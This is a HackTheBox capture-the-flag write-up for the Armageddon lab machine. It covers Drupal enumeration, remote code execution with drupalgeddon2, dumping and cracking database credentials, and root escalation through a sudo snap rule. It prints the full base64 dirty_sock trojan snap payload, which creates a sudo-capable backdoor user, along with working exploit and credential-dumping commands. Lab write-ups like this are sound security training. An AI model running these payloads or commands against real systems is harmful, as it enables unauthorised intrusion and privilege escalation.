HackTheBox Armageddon Writeup
Enjoy reading my HTB Armageddon Writeup
Information Gathering
Let's start with gaining some information about the HTB Armageddon machine using nmap:
sudo nmap -p 1-5000 -sV -sC -v 10.10.10.233
This shows that an SSH service is running on port 22 and an Apache httpd 2.4.6 (CentOS) service on port 80.
Next, I used gobuster for directory enumeration:
gobuster dir -u http://10.10.10.233/ -w Lists/gobuster/directory.txt
That revealed the following ones:
0/scripts (Status: 301) [Size: 236] [--> http://10.10.10.233/scripts/]
1/sites (Status: 301) [Size: 234] [--> http://10.10.10.233/sites/]
2/includes (Status: 301) [Size: 237] [--> http://10.10.10.233/includes/]
3/profiles (Status: 301) [Size: 237] [--> http://10.10.10.233/profiles/]
4/themes (Status: 301) [Size: 235] [--> http://10.10.10.233/themes/]
5/misc (Status: 301) [Size: 233] [--> http://10.10.10.233/misc/]
6/modules (Status: 301) [Size: 236] [--> http://10.10.10.233/modules/]
I enumerated the various files but couldn't extract anything useful or sensitive information. After some further checking, I recognized a file called "drupal.js" which is a web content management framework.
After some more research, I found several exploits for different Drupal versions, where "drupalgeddon2" based on CVE-2018-7600 allowing Remote Code Execution looked the most promising.
Exploiting Drupal
First, I used this script for around an hour trying to get a reverse shell using php or bash but didn't have any success.
Then I decided to archive the current working directory and download it to my local machine for further investigation:
python drupalgeddon2.py -h http://10.10.10.233 -c 'tar -czvf /var/www/html/archive.tar.gz /var/www/html'
After some more time, I eventually found the file settings.php in /var/www/html/sites/default which contained a database username and password.
Many tries later I gave up gaining a reverse shell manually and fired up the metasploit framework and selected exploit/unix/web app/drupal_drupalgeddon2
.
This time I was able to gain a meterpreter session at the third try and spawned a shell using shell
.
Accessing the Database
With mysql -u drupaluser -pCQHEy@9M*m23gBVj -s 'show databases;'
I printed all the databases and yes there is no space between the flag (-p) and the password itself...
0mysql -u drupaluser -pCQHEy@9M*m23gBVj -e 'show databases;'
1Database
2information_schema
3drupal
4mysql
5performance_schema
Then it was time to get all the tables:
0mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'show tables;'
1Tables_in_drupal
2actions
3[...]
4url_alias
5users
6users_roles
7variable
8watchdog
Finally, let's get the content of the user table:
0mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'select * from users;'
1uid name pass mail theme signature signature_format created access login status timezone language picture init data
20 NULL 0 0 0 0 NULL 0 NULL
31 brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt admin@armageddon.eu filtered_html 1606998756 1607077194 1607076276 1 Europe/London 0 admin@armageddon.eu a:1:{s:7:"overlay";i:1;}
I never saw a hash starting with $S$
before so I had to look that up first and learned that it's drupal's hashing algorithm called Drupal7
.
Because my pentesting VM does not have the GPU power of my host machine I copied the hash to it and ran hashcat there:
hashcat -a 0 -m 7900 hash.txt rockyou.txt
and
hashcat -a 0 -m 7900 hash.txt rockyou.txt --show
During my enumeration earlier I also took a look at the /etc/passwd file and saw that there is a user called "brucetherealadmin" who also appears in the database.
Gaining the user flag and root privileges
To gain the user flag I connected to the server using ssh and the password we just de-hashed.
Now you are able to obtain the user flag.
In order to escalate our privileges I first checked sudo -l
0[brucetherealadmin@armageddon home]$ sudo -l
1Matching Defaults entries for brucetherealadmin on armageddon:
2 !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
3 LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
4 LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
5 XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
6
7User brucetherealadmin may run the following commands on armageddon:
8 (root) NOPASSWD: /usr/bin/snap install *
After some more research on github and gtfobins I found "dirty_sock" (do yourself a favor and add "GitHub" to your search query).
I copied the payload from that script:
0TROJAN_SNAP = ('''
1aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD/
2/////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJh
3ZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5
4TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERo
5T2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawpl
6Y2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFt
7ZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZv
8ciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5n
9L2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZt
10b2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAe
11rFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUj
12rkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAA
13AAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2
14XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5
15RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAA
16AFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw'''
17 + 'A' * 4256 + '==')
and used echo <PAYLOAD> | base64 -d > privesc.snap
to create a snap file.
Using sudo snap install --devmode privesc.snap
we can install dirty-sock and switch to the freshly created user:
su dirty_sock
(password: dirty_sock).
From there we can escalate the privileges to root with sudo /bin/bash
and finally obtain the system flag in the root directory.
0[brucetherealadmin@armageddon ~]$ sudo snap install --devmode exp.snap
1dirty-sock 0.1 installed
2[brucetherealadmin@armageddon ~]$ su dirty_sock
3Password:
4[dirty_sock@armageddon brucetherealadmin]$ sudo /bin/bash
5
6We trust you have received the usual lecture from the local System
7Administrator. It usually boils down to these three things:
8
9 #1) Respect the privacy of others.
10 #2) Think before you type.
11 #3) With great power comes great responsibility.
12
13[sudo] password for dirty_sock:
14[root@armageddon brucetherealadmin]# cat /root/root.txt
1588007da3dadc638aa75cd3c363165e12
Tags:
armageddon, htb, hackthebox, walkthrough, writeup